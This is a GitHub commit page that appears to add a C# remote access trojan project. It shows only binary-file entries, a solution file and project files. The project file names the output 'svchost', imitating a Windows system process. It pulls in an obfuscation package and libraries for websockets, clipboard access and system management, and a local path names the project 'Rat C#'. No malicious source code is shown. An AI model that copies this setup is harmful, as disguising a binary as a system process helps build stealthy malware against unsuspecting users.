Skip to content

Commit

Permalink
All
Browse files Browse the repository at this point in the history
  • Loading branch information
aDarkDev committed Jul 12, 2023
1 parent 67612ad commit e587502
Show file tree
Hide file tree
Showing 52 changed files with 1,837 additions and 0 deletions.
Binary file added C# Part/.vs/App/DesignTimeBuild/.dtbcache.v2
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Empty file.
Binary file added C# Part/.vs/App/v17/.futdcache.v2
Binary file not shown.
Binary file added C# Part/.vs/App/v17/.suo
Binary file not shown.
Binary file added C# Part/.vs/ProjectEvaluation/app.metadata.v5.2
Binary file not shown.
Binary file added C# Part/.vs/ProjectEvaluation/app.metadata.v6.1
Binary file not shown.
Binary file added C# Part/.vs/ProjectEvaluation/app.projects.v5.2
Binary file not shown.
Binary file added C# Part/.vs/ProjectEvaluation/app.projects.v6.1
Binary file not shown.
36 changes: 36 additions & 0 deletions C# Part/App.csproj
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
<Project Sdk="Microsoft.NET.Sdk">

<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
<IsPublishable>True</IsPublishable>
<AssemblyName>svchost</AssemblyName>
<RootNamespace>svchost</RootNamespace>
</PropertyGroup>

<ItemGroup>
<COMReference Include="Accessibility">
<WrapperTool>tlbimp</WrapperTool>
<VersionMinor>1</VersionMinor>
<VersionMajor>1</VersionMajor>
<Guid>1ea4dbf0-3c3b-11cf-810c-00aa00389b71</Guid>
<Lcid>0</Lcid>
<Isolated>false</Isolated>
<EmbedInteropTypes>true</EmbedInteropTypes>
</COMReference>
</ItemGroup>

<ItemGroup>
<PackageReference Include="Eziriz.Reactor.TrimHelper" Version="6.9.0" />
<PackageReference Include="Microsoft.DotNet.ILCompiler" Version="7.0.5" />
<PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
<PackageReference Include="System.Diagnostics.PerformanceCounter" Version="7.0.0" />
<PackageReference Include="System.DirectoryServices" Version="7.0.1" />
<PackageReference Include="System.Management" Version="7.0.1" />
<PackageReference Include="TextCopy" Version="6.2.1" />
<PackageReference Include="WebSocketSharp-netstandard" Version="1.0.1" />
</ItemGroup>

</Project>
6 changes: 6 additions & 0 deletions C# Part/App.csproj.user
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<_LastSelectedProfileId>D:\Projects\Rat C#\App\Properties\PublishProfiles\FolderProfile.pubxml</_LastSelectedProfileId>
</PropertyGroup>
</Project>
25 changes: 25 additions & 0 deletions C# Part/App.sln
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.4.33205.214
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "App", "App.csproj", "{463AC43A-7641-4957-B5EB-9A62BDF9C551}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{463AC43A-7641-4957-B5EB-9A62BDF9C551}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{463AC43A-7641-4957-B5EB-9A62BDF9C551}.Debug|Any CPU.Build.0 = Debug|Any CPU
{463AC43A-7641-4957-B5EB-9A62BDF9C551}.Release|Any CPU.ActiveCfg = Release|Any CPU
{463AC43A-7641-4957-B5EB-9A62BDF9C551}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {F59BBBE2-6829-47BE-AD97-D09B17340CB3}
EndGlobalSection
EndGlobal
Binary file added C# Part/MqOA10.Tlb
Binary file not shown.
Binary file added C# Part/MqOA20.Tlb
Binary file not shown.
Binary file added C# Part/MsXml.Tlb
Binary file not shown.
Binary file added C# Part/NetFW.TLB
Binary file not shown.
Loading

0 comments on commit e587502

Please sign in to comment.